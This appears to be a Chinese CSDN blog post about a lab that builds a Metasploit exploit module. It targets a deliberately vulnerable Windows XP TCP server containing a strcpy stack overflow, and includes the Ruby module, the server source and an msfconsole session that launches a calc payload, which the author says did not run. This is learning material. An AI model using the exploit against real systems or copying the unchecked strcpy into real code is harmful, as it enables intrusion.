4.2 metasploit 开发 exploit

最新推荐文章于 2024-04-26 20:05:58 发布
最新推荐文章于 2024-04-26 20:05:58 发布
阅读量716 收藏 2
点赞数 2
分类专栏: 0day安全 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/126528055
版权

目录

一、实验清单

二、实验思路

三、实验步骤

一、实验清单

实验清单
类型序号软硬件要求规格
攻击机1数量1台
2操作系统版本kali
3软件版本metasploit
靶机1数量1台
2操作系统版本windows xp sp3
3软件版本vc++

二、实验思路

        靶机:采用一个存在典型栈溢出的server,其代码如下:

#include<iostream.h>
#include<winsock2.h>
#pragma comment(lib,"ws2_32.lib") 
void msg_display(char *buf)
{
	char msg[200];
	strcpy(msg,buf);  //overflow here,copy 0x200 to200
	cout<<"***************"<<endl;
	cout<<"received:"<<endl;
	cout<<msg<<endl;
}

void main()
{
	int sock,msgsock,lenth,receive_len;
	struct sockaddr_in sock_server,sock_client;
	char buf[0x200];//notice it is 0x200

	WSADATA wsa;
	WSAStartup(MAKEWORD(1,1),&wsa);
	if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		cout<<sock<<"socket creating error!"<<endl;
		exit(1);
	}
	sock_server.sin_family=AF_INET;
	sock_server.sin_port=htons(7777);
	sock_server.sin_addr.s_addr=htonl(INADDR_ANY);
	if(bind(sock,(struct sockaddr*)&sock_server,sizeof(sock_server)))
	{
		cout<<"binging stream socket error!"<<endl;
	}
	cout<<"****************************"<<endl;
	cout<<"exploit target server 1.0 "<<endl;
	cout<<"****************************"<<endl;
	listen(sock,4);
	lenth=sizeof(struct sockaddr);
	do{
		msgsock=accept(sock,(struct sockaddr*)&sock_client,(int*)&lenth);
		if(msgsock==-1)
		{
			cout<<"accept error"<<endl;
			break;
		}
		else
			do
			{
				memset(buf,0,sizeof(buf));
				if((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
				{
					cout<<"reading stream message error!"<<endl;
					receive_len=0;
				}
				msg_display(buf);   //trigged the overflow
			}while(receive_len);
			closesocket(msgsock);
	}while(1);
	WSACleanup();
}

        程序大致思路:在vc++中编译运行后,程序会在7777端口监听TCP连接,如果收到数据,就在屏幕上打印出来。在main函数中,buf数组的大小被声明为0x200,在mag_display函数中,将大小为0x200的字符串复制进200大小的局部数组,从而引发一个典型的栈溢出。

        攻击机:使用Ruby语言开发一个exploit模板,并在MSF上运行以测试漏洞。Ruby脚本如下:

#!/usr/bin/env ruby
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	include Exploit::Remote::TCP
	def initialize(info = {})
		super(update_info(info,
		'Name' => 'failwest_test',
		'Platform' => 'win',
		'Target' => [
			['Windows 2000',{'Ret' => 0x77F8948B}],
			['WIndows XP SP3',{'Ret' => 0x77D928A3}]
			],
		'Payload' => {
			'Space' => 2000,
			'BadChars' => "\x00",
			}
		))
	end #end of initialize
	def exploit
		connect
		attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
		sock.put(attack_buf)
		handler
		disconnect
	end #end of exploit def
end #end of class def

        对上述代码进行简单解释:

        (1)require指明所需的类库,相当于C语言的include;

        (2)运算符“<”表示继承,也就是,我们这里所定义的类是由Msf::Exploit::Remote继承而来;

        (3)在类中,定义了两个方法(函数),一个是initialize,另一个是exploit。现在模板的框架可以看成:

class xxx
    
    def initialize
    #定义模块初始化信息,如漏洞适用的操作系统平台、为不同操作系统指明不同的返回地址
    #指明shellcode中禁止出现的特殊字符、漏洞相关描述、URL引用、作者信息等
    end

    def exploit
    #将填充物、返回地址、shellcode等组织成最终的attack_buf,并发送
    end

end

        从实验所用的Ruby脚本看initialize:

def initialize(info = {})
		super(update_info(info,
		'Name' => 'failwest_test',
		'Platform' => 'win',
		'Target' => [
			['Windows 2000',{'Ret' => 0x77F8948B}],
			['WIndows XP SP3',{'Ret' => 0x77D928A3}]
			],
		'Payload' => {
			'Space' => 2000,
			'BadChars' => "\x00",
			}
		))
	end #end of initialize

        (1)Name模块的名称,在msf console中,使用“show exploit”命令,会显示每一个exploit的序号、路径...以及此时这个Name;

        (2)Platform模块运行平台,MSF通过这个值来为exploit挑选payload。本例中,该值为‘win’,在挑选payload时,MSF只会选择windows平台的payload,而BSD、linux的payload将会被禁用。

        (3)Targets可以定义多种操作系统的返回地址。可以用ollydbg或者msf有个模块可以获取跳转指令的返回地址。

        (4)Payload则是对shellcode的要求,如大小和禁止用的字节等。

        再看exploit:

def exploit
		connect
		attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
		sock.put(attack_buf)
		handler
		disconnect
	end #end of exploit def

        对于attack_buf:

attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded

         (1)用200个字符“a”填充缓冲区;

        (2)pack('V')的作用是把数据按照DWORD逆序

        (3)payload.excoded是将payload编码。

三、实验步骤

1、在靶机上编译并运行漏洞程序;

2、在攻击机上编写Ruby脚本,保存为“test_exploit.rb”,存放路径为:

/var/usr/share/metasploit-framework/modules/exploits/failwest/

3、启动msf console,并且输入以下命令;

msf6 > use exploit/failwest/test_exploit
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(failwest/test_exploit) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows 2000
   2   WIndows XP SP2


msf6 exploit(failwest/test_exploit) > set target 2
target => 2
msf6 exploit(failwest/test_exploit) > show payloads

Compatible Payloads
===================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   payload/generic/custom                                                normal  No     Custom Payload
   1   payload/generic/debug_trap                                            normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                        normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                     normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                          normal  No     Interact with Established SSH Connection
   5   payload/generic/tight_loop                                            normal  No     Generic x86 Tight Loop
   6   payload/windows/dllinject/reverse_nonx_tcp                            normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   7   payload/windows/dllinject/reverse_ord_tcp                             normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   8   payload/windows/exec                                                  normal  No     Windows Execute Command
   9   payload/windows/meterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   10  payload/windows/meterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   11  payload/windows/metsvc_bind_tcp                                       normal  No     Windows Meterpreter Service, Bind TCP
   12  payload/windows/metsvc_reverse_tcp                                    normal  No     Windows Meterpreter Service, Reverse TCP Inline
   13  payload/windows/patchupdllinject/reverse_nonx_tcp                     normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   14  payload/windows/patchupdllinject/reverse_ord_tcp                      normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   15  payload/windows/patchupmeterpreter/reverse_nonx_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   16  payload/windows/patchupmeterpreter/reverse_ord_tcp                    normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   17  payload/windows/peinject/reverse_nonx_tcp                             normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   18  payload/windows/peinject/reverse_ord_tcp                              normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   19  payload/windows/powershell_bind_tcp                                   normal  No     Windows Interactive Powershell Session, Bind TCP
   20  payload/windows/powershell_reverse_tcp                                normal  No     Windows Interactive Powershell Session, Reverse TCP
   21  payload/windows/powershell_reverse_tcp_ssl                            normal  No     Windows Interactive Powershell Session, Reverse TCP SSL
   22  payload/windows/shell/reverse_nonx_tcp                                normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   23  payload/windows/shell/reverse_ord_tcp                                 normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   24  payload/windows/upexec/reverse_nonx_tcp                               normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   25  payload/windows/upexec/reverse_ord_tcp                                normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   26  payload/windows/vncinject/reverse_nonx_tcp                            normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   27  payload/windows/vncinject/reverse_ord_tcp                             normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

msf6 exploit(failwest/test_exploit) > set payload windows/exec
payload => windows/exec
msf6 exploit(failwest/test_exploit) > show options

Module options (exploit/failwest/test_exploit):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/ra
                                      pid7/metasploit-framework/wiki/Using-Metasplo
                                      it
   RPORT                    yes       The target port (TCP)


Payload options (windows/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread,
                                        process, none)


Exploit target:

   Id  Name
   --  ----
   2   WIndows XP SP2


msf6 exploit(failwest/test_exploit) > set rhost 192.168.92.132  //靶机IP
rhost => 192.168.92.132
msf6 exploit(failwest/test_exploit) > set rport 7777
rport => 7777
msf6 exploit(failwest/test_exploit) > set cmd calc
cmd => calc
msf6 exploit(failwest/test_exploit) > set exitfunc seh
exitfunc => seh
msf6 exploit(failwest/test_exploit) > exploit

4、回到靶机,可以看到如下界面:

        唯一的不足就是:shellcode已经注入到靶机中了,但是没有运行。

        为此,做了以下努力:

        (1)使用telnet命令,连接到了靶机,并且也正常输出字符,说明漏洞程序没有问题;

         (2)在msf中,使用generate命令,将payload为windows/exec的shellcode找出来,并且用加载程序在靶机上运行,结果是可以调出计算器,正常运行。

        至此,具体为什么使用exploit注入的shellcode无法运行的原因不知,有待进一步研究。

PT_silver
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 漏洞利用Exploit)详解
悦分享
11-27 900
由于它经常发生在SEH溢出攻击中,我们现在需要找到一个POP POP RET(其他序列也很好,以及在“击败Microsoft Windows 2003服务器的基于堆栈的缓冲区溢出预防机制”Litchfield 2003)中的地址,以便将执行流程重定向到我们的缓冲区。所以我们看到我们调用了pattern_create函数,它最多只需要两个参数,我们正在创建的缓冲区的大小以及一个可选的第二参数,它们使我们可以控制缓冲区的内容。请注意,将最初的公共漏洞利用作者命名为他们的辛勤工作是首先发现该漏洞的通常礼貌。
Metasploit开发指南
04-17
Metasploit开发的官方指南,详细说明了Metasploit框架的结构。
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
小迪WEB
热门推荐
weixin_52125240的博客
09-26 2万+
WEB-学习小迪安全第01天:基础入门—概念名词域名 小迪安全 第01天:基础入门—概念名词 域名 1)什么是域名? 域名,是由一串用点分割的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时计算机的电子方位; 例如:www.bilibili.com 2)域名在哪里注册? 在第三方平台上注册,国内的一些域名注册商,比如阿里云旗下的万网。 3)什么是二级域名多级域名? 二级域名:顶级域名之下的域名。 例如: www.baidu.com为主域,则图中news.baidu.com为二级域
小迪安全_web漏洞
weixin_44060420的博客
06-08 394
知识点:1、ASP环境搭建组合 asp 很少很少见了2、ASP数据库下载&植入3、S-短文件&解析&写权限WEB安全攻防:1、Web源码2、开发语言3、中间件平台4、数据库类型4、第三方插件或软件演示案例:ASP-数据库-MDB默认下载ASP-数据库-ASP后门植入连接ASP-中间件-IS短文件名探针-安全漏洞ASP-中间件-IIS文件上传解析-安全漏洞ASP-中间件-IIS配置目录读写-安全配置。
Metasploit——渗透攻击模块(Exploit)
m0_62063669的博客
08-10 2972
开放21,ftp,称为ftp服务器)。A发送某种类型的漏洞利用代码给B,这个漏洞利用代码利用之后,加载payload,在B。-b排除坏字符,-t输出文件格式,-e指定encoder,-i使用5轮,-k线程,-x模板,-f输出文件。exploits漏洞利用代码,由于B请求A,就作为A的响应报文把漏洞利用代码内容返回给。判断主动还是被动,是看漏洞利用代码,是主动发过去的,还是被动等待客户端连接服务器端而造成客户端漏洞被利用。2.本地不侦听端口,反弹连接给A侦听的另外一个端口,连接后,B就把shell给A。..
【Python脚本进阶】2.4、conficker蠕虫(中):Python脚本与Metasploit交互
07-31 551
【Python脚本进阶】Python脚本与Metasploit交互
Exploit编写
CYXMDTT的博客
03-24 239
3:构造利用payload:一旦确认漏洞和漏洞类型,你需要编写一个利用payload,该payload可以利用漏洞来执行你的代码或控制程序流。payload的构造方法因漏洞类型而异,例如在栈溢出中,需要构造一个能够覆盖返回地址的输入,而在格式字符串漏洞中,则需要构造一个字符串,使其能够读取内存中的敏感数据。在栈溢出中,需要确定返回地址的地址,而在格式字符串漏洞中,需要确定格式字符串的地址。2:确认漏洞类型:根据确认的漏洞,你需要确定漏洞的类型,例如栈溢出、堆溢出等。
Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3341
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
Python脚本与Metasploit交互攻击
谢公子的博客
11-08 5501
Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本与Metasploit进行交互,可以自动化的扫描和利用漏洞。 相关文章:Metasploit框架的使用 在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为...
Metasploit-The Exploit Learning Tree
10-18
Metasploit-The Exploit Learning Tree 20171018下载,本来想免费共享,结果系统设定最小值2个资源分
metasploit开发使用详细解析
04-11
metasploit开发使用详细解析
metasploit4.2安装程序
03-15
metasploit4.2安装程序,强大的漏洞检测工具,方便大家学习使用
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 813
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 320
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 243
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
无需公网IP,安全稳定实现U8C异地访问
asdaddsd的博客
04-21 272
快解析内网穿透实现在任何地域、任何时间、任何网络环境,快速访问内网的各种应用。为了进一步保证企业访问的安全性,快解析域名不仅支持https协议、免开端口,同时在无忧版、钻石版、旗舰版、星耀版增加了访问白名单、访问密码功能,让企业数据更安全。快解析内网穿透经常运用在远程办公OA、数据库、搭建web网站、ERP、访问NAS、信息管理、文件共享FTP、软件跨网互通等各种场景。在财务、人力、供应链、采购、制造、营销、研发、项目、资产、协同等领域为客户提供数字化、智能化、社会化的企业云服务产品与解决方案。
4.3 海思SS928开发 - uboot开发 - 非安全启动镜像制作
luohaha66的博客
04-23 233
上电,启动GSL,启动uboot,引导内核启动。
Windows 安全中心:页面不可用 你的 IT 管理员已限制对此应用的某些区域的访问,并且你尝试访问的项目不可用。有关详细信息,请与 IT 支持人员联系。
u013669912的博客
04-22 559
Windows 安全中心提示:【页面不可用 你的 IT 管理员已限制对此应用的某些区域的访问,并且你尝试访问的项目不可用。有关详细信息,请与 IT 支持人员联系。】 Windows 11 重置后,无法打开 windows 安全中心,或打开安全中心背景是白色
Metasploitexploit模块
06-08
Metasploitexploit模块是用于利用系统或应用程序中的漏洞的工具。它们可以自动化攻击过程,从而更容易地入侵目标系统。exploit模块常常以代码的形式存在,可以利用各种不同的漏洞类型,包括堆溢出、格式化字符串...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值